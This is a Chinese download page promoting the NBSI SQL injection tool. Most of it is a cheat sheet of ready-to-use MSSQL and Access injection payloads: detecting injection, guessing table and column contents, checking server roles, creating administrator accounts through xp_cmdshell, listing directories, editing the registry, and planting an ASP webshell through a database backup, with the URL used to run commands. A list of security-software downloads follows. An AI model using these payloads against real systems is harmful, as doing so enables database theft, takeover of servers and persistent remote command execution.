标签: nbsisql
nbsi 3.0纯净版是一款专业的网站漏洞检测工具,使用该软件用户可以快速的检测网站漏洞,检测结果精准,速度快,可以快速的提高该行业人员办公效率,欢迎来绿色资源网下载!
本工具功能非常强大,希望同学们用于正途,别去做一些偷鸡摸狗的令人可耻的事情,由VB语言编写的网站漏洞检测工具的名称,ASP注入漏洞检测工具,特别在sql server注入检测方面有极高的准确率。
1.判断是否有注入
;and 1=1
;and 1=2
2.初步判断是否是mssql
;and user>0
3.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4.注入参数是字符
'and [查询条件] and ''='
5.搜索时没过滤参数的
'and [查询条件] and '%25'='
6.猜数据库
;and (Select Count(*) from [数据库名])>0
7.猜字段
;and (Select Count(字段名) from 数据库名)>0
8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql)
;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('serveRadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(SELECT IS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,
username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin
username;--
;exec master.dbo.xp_cmdshell 'net user username
password /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add'
;--
;exec master.dbo.xp_cmdshell 'net user username
password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup
administrators username /add';--
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not
in('上步得到的paths'))>)
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';-- 获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:webindex.asp';-- 查看文件的内容
13.mssql中的存储过程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersionRun' 以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersion',
'CommonFilesDir' 返回制定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersion',
'TestValueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersion',
'TestValueName' 删除某个值
xp_regdeletekey 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersionTestkey' 删除键,包括该键下所有值
14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<% Dim oScript %>');
backup database model to disk='c:l.asp';
15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库
16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='g:wwwtestl.asp';
请求的时候,像这样子用:
http://ip/l.asp?c=dir
解压密码:www.downcc.com
加载全部内容
安全保密检查工具软件下载v7.0 最新版5.9M1人在玩安全保密检查工具是一计算机安全保密检查软件,主要是帮助用户检测系统信息检查、硬盘信息检查、硬件设备检查,软件信息检查是一款功能齐全的检查工具,保障电脑中的重要文件的安全,需要的朋友们下载吧。
下载360小贝守护v1.0.0.1001 官方版2.6M1人在玩360小贝守护是一款非常好用的网络安全软件,它是今年六一作为360安全卫士15周年全面安全品牌计划的重要一环推出的,旨在为青少年打造安全上网环境,感兴趣的朋友快来下载吧。
下载网站安全狗iis版v4.0 官方版30.0M0人在玩网站安全狗iis版是款专为windows平台上的IIS服务器打造的网站安全防护检测工具。网站安全狗iis版拥有防注入、防CC及网马查杀等功能,全面保护您的网站安全。网站安全狗主要有网马查杀、主动防御、.Net设置、流量资源保护等功能。有了网站安全狗iis版,服务器管理员
下载网络还原精灵(iRecovery)v8.2 免费版37.2M0人在玩网络还原精灵8破解版(iRecovery)是一款纯软件版网络硬盘保护工具,对被控端的电脑提供硬盘还原保护、网络对拷等功能,而通过网络上的主控端可以对各被控端进行统一的远程管理。
下载glasswire elitev2.0.84官方版33.8M0人在玩glasswireelite是款网络防火墙软件,软件使用方便,给你提供多种好用的功能,可随时进行网络监控,给你提供网络安全保障,是个人用户电脑必备工具,功能强大。
下载Folder Firewall Blockerv1.3 官方版146KB0人在玩FolderFirewallBlocker是一款能够帮助大家快速阻止文件夹及内文件访问网络的工具,平时可能没注意这些会发现文件夹会访问网络占用宽带,很多人会介意这点,小编分享的这款工具刚好能帮助大家,需要的下载哦。
下载Abelssoft HackCheck官方下载v2018 免费版2.2M0人在玩AbelssoftHackCheck官网。AbelssoftHackCheck是一款非常好用的安全软件,可以有效的防止黑客入侵你的电脑,极大的保障了用户的上网安全。
下载宁波地税i信v5.0.18.111 官方版15.3M0人在玩宁波地税i信是为宁波地税准备的软件,软件使用方便,确保地税网络安全,让工作人员可以在安全的环境中工作,进行各种好用的服务,有需要的可以来下载使用。
下载Easy Firewall(防火墙辅助工具)v1.88 绿色免费版10.1M0人在玩EasyFirewall官网。EasyFirewall防火墙辅助工具是一款可以帮助您的电脑进行防火墙设置的高效软件,如果您觉得某些防火墙防护面积不够,可以使用这款EasyFirewall防火墙辅助工具进行偏好设置。
下载360防火墙官方下载v6.0 最新版1.4M0人在玩360安全卫士防火墙全面升级,主动防御6.0震撼上线!360防火墙拥有22层立体防护、DNS安全防护、U盘安全防护、漏洞入侵防护等功能,超强悍的主动防御体系,更简洁的交互场景、更快速的应急机制、更稳定的操作性能以及更加强大的防护能力,时刻守护你的电脑安全。
下载